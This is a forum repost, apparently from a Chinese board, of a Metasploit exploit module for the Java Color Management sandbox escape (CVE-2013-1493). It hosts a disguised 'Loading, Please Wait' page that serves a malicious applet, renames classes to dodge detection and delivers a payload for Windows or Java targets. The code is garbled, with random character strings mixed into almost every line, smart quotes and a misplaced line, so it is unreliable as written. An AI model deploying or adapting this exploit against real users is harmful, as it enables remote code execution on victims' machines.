##
4 s: k: ?! r. E! W- }% T2 Y1 {! Z1 u4 Y
* o5 P1 b$ p* E4 h p1 c* s# This file is part of the Metasploit Framework and may be subject to! K. m6 o0 ?# t* D
# redistribution and commercial restrictions. Please see the Metasploit2 c: t% R9 |! [6 e2 I6 ?
# web site for more information on licensing and terms of use.
3 C" c7 Z" n7 J5 e2 m) i) F# http://metasploit.com/
3 Y* _2 S4 n! A. G7 U( ^+ R3 R$ t##
2 }1 l9 }5 I$ M8 ?' Crequire ‘msf/core’
( U# {$ H, W. ]. ~4 }4 |require ‘rex’) \# \# ~% c! A- ?5 a4 o0 z
class Metasploit3 < Msf::Exploit::Remote
/ ]7 T( x; k9 TRank = NormalRanking
& E7 j0 q9 Z" O" [include Msf::Exploit::Remote::HttpServer::HTML& ~" r) k: J" v- [
include Msf::Exploit::EXE
& k r; J' _5 T4 ]" ]* ~include Msf::Exploit::Remote::BrowserAutopwn, M6 A& x0 ?) V+ _' q1 K
autopwn_info({ :javascript => false }) H' U' V* z9 x5 F: h# z7 y
def initialize( info = {} )
3 k4 N% K* U' E: K0 x' z) g2 Usuper( update_info( info,
: @* u% V9 v+ b0 W( a. Y s‘Name’ => ‘Java CMM Remote Code Execution’,
7 L) F; o) g$ w% W‘Description’ => %q{
C |6 X$ C6 v9 [This module abuses the Color Management classes from a Java Applet to run
$ h& ^' D; b/ S3 Z' J% k2 g+ Larbitrary Java code outside of the sandbox as exploited in the wild in February( V+ N" [3 W+ |0 r' S
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u414 F1 z9 `, h' }# R
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
, p, `0 n8 P; T# Lsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java. [/ _0 S' Y2 V# u- h7 ^& x
warning in order to run the malicious applet.2 J1 F7 ?" b7 ~2 M- G
},
: y! W: o5 S% Q$ l6 x‘License’ => MSF_LICENSE,. D/ d3 \$ a. [5 B0 S2 I
‘Author’ =>& k' r1 P/ G8 {# d1 k
'Unknown', # Vulnerability discovery and Exploit
& B5 F- U$ l1 M'juan vazquez' # Metasploit module (just ported the published exploit) i5 a2 r0 U6 x5 ~6 d% x, Y" f
],: N% p# f% |. t
‘References’ =>6 m( f6 N# Q; S w
[
+ ]; y0 d3 o' |9 q+ Q7 D! W6 J[ 'CVE', '2013-1493' ],
! D; K+ ~4 X$ v5 v0 ]1 O[ 'OSVDB', '90737' ],
( `3 z; U' m! X, q[ 'BID', '58238' ],' K. r& v' J% r4 q- J. B' ^ {
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],- c5 f4 s: b( k* ]7 @2 }" S
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],3 X! a" k+ P. R+ X* C
[ 'URL', 'http://pastie.org/pastes/6581034' ]2 D) j" o' }- k, V/ R& a8 m
],! U% }5 c4 z% J3 z% q
‘Platform’ => [ 'win', 'java' ],
( A! A+ e4 \% q6 J( q‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },8 V" l! H: Q' S% Z$ R6 q
‘Targets’ =>6 r4 S! {2 K! r: \; c/ I
[, o, Z: T& F! ~ r T# g
[ 'Generic (Java Payload)'," j9 k0 G1 @5 Y/ _7 _. }
{) e6 B: X' |) R4 U; Z
'Platform' => 'java',
+ T3 d9 u6 [, a1 `% Z( U$ k% C! J'Arch' => ARCH_JAVA7 u5 k' m( o& t( J( S
}+ J/ [4 |5 {! ^5 x W' u ^
],# b1 C% |5 t7 _) O1 p# I
[ 'Windows x86 (Native Payload)',4 V. G* z7 d: n5 S- H
{
: ]9 b5 Z- T+ Y+ C D5 u: O# d'Platform' => 'win',
. Z; k' r6 _: z7 R. \4 H'Arch' => ARCH_X86
( {# j$ z" h% B8 H0 v8 J7 n4 K}; {0 I9 a. p# A2 E
]
1 \) G3 A( `" r" ]],
$ K' v7 t: _: b5 S) E‘‘DisclosureDate’ => ‘Mar 01 2013′
( d9 u, v' n7 ? ]/ b1 ?4 [))1 E: X! b0 _/ B& E
end% d# P& y2 N5 N! {& S9 k
def setup
$ F2 e% |7 R4 \1 O+ [# c% [path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)3 k& F) d$ i' m( K3 Q4 f
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }8 p* A5 ]5 |) q0 M. S+ u
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
8 c% m3 G# ?! R; m; N5 u@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. C' X* g7 F5 W' g8 v1 z
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
3 f$ V/ J6 ]0 [; K@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% m; R. h$ Y! Y# c' n. ?path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
1 h( w. u6 V% D8 E@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
: |- G. q- k/ n' o7 y! i@init_class_name = rand_text_alpha(“Init”.length)# i' ~) I/ {* ~4 Y0 ?7 q" Z; X
@init_class.gsub!(“Init”, @init_class_name)
5 p( E: S! Q& Z" d' ]super
, N: }- B" w$ A; v3 iend
( i( x/ I" h1 |$ sdef on_request_uri(cli, request)2 E( }, Y3 e1 H6 z- k; r
print_status(“handling request for #{request.uri}”)5 p+ i) P+ w I1 Z5 m: h
case request.uri% j5 g) [* b% J- t8 j" N1 K9 g
when /\.jar$/i
; n& l+ f; k6 s( W3 Q( k8 cjar = payload.encoded_jar6 n8 U5 b9 M" N. W
jar.add_file(“#{@init_class_name}.class”, @init_class)' u3 l( g0 W3 D# U7 C: _
jar.add_file(“Leak.class”, @leak_class)
4 F, K, J9 l, \0 ?" r" ^; }jar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 b# H5 K2 I! Z
jar.add_file(“MyColorSpace.class”, @color_space_class)
& x- c0 O' k0 [4 bDefaultTarget’ => 1,0 E! d6 u6 R# ~6 q- d7 S* _
metasploit_str = rand_text_alpha(“metasploit”.length)- k: x, n# a' Q! D) r
payload_str = rand_text_alpha(“payload”.length)0 H5 o2 L# }) G3 b( i- R( u N
jar.entries.each { |entry|% d" _$ P8 w& |" o2 W. w) t! f
entry.name.gsub!(“metasploit”, metasploit_str)
3 g. F, W! J" [* Y. M0 kentry.name.gsub!(“Payload”, payload_str)
7 x1 B+ C) J* R9 s7 |: m9 n9 _entry.data = entry.data.gsub(“metasploit”, metasploit_str)3 _& m* o# A9 w- V5 v5 h
entry.data = entry.data.gsub(“Payload”, payload_str)8 ?" M8 T# O% Y* F. W0 w6 F
} I* b2 I( K. ~$ X9 m# U1 o+ ^/ @
jar.build_manifest' e; c1 w- H! a
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
9 s* c- Y) b# T' ^9 N& Iwhen /\/$/8 k( x0 \" Y! G9 o+ X4 H* y e
payload = regenerate_payload(cli)5 e+ ?* u7 x: z( e( T# r! L
if not payload e6 w, o. x* E5 r" S/ V* w
print_error(“Failed to generate the payload.”). r# Z& J: C+ t! h
send_not_found(cli)) C, P/ ~' p6 I
return a9 _/ g5 w4 m) e8 Y0 }
end
/ ^# P' e: V. ^send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
. I( c8 ]5 {, T, Welse
) G* @1 h/ g8 B; y1 esend_redirect(cli, get_resource() + ‘/’, ”), S) ]/ r, T" H+ B: u7 |5 `/ G
end, A9 ?; C, O7 U* y: @" A
end( o% K* Q. X0 \
def generate_html
$ m8 m0 } M# s# Jhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
* D) @7 S2 e3 n$ J- ]. U) P, z6 l9 D5 w; rhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|% d$ A% ^: ^; j4 D6 ~
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|6 y! C) W0 s* g" G& g% \
html += %Q|</applet></body></html>|" ~3 C! ~/ s% l, X" y
return html4 q' o6 m+ q9 D
end# f8 ?* M9 [8 Q% }- w! V/ h
end, [/ _0 [$ |- [& \
end
* P$ p/ X; s% x8 J& r |
发表于 2013-4-4 17:31:17
收藏
分享
支持
反对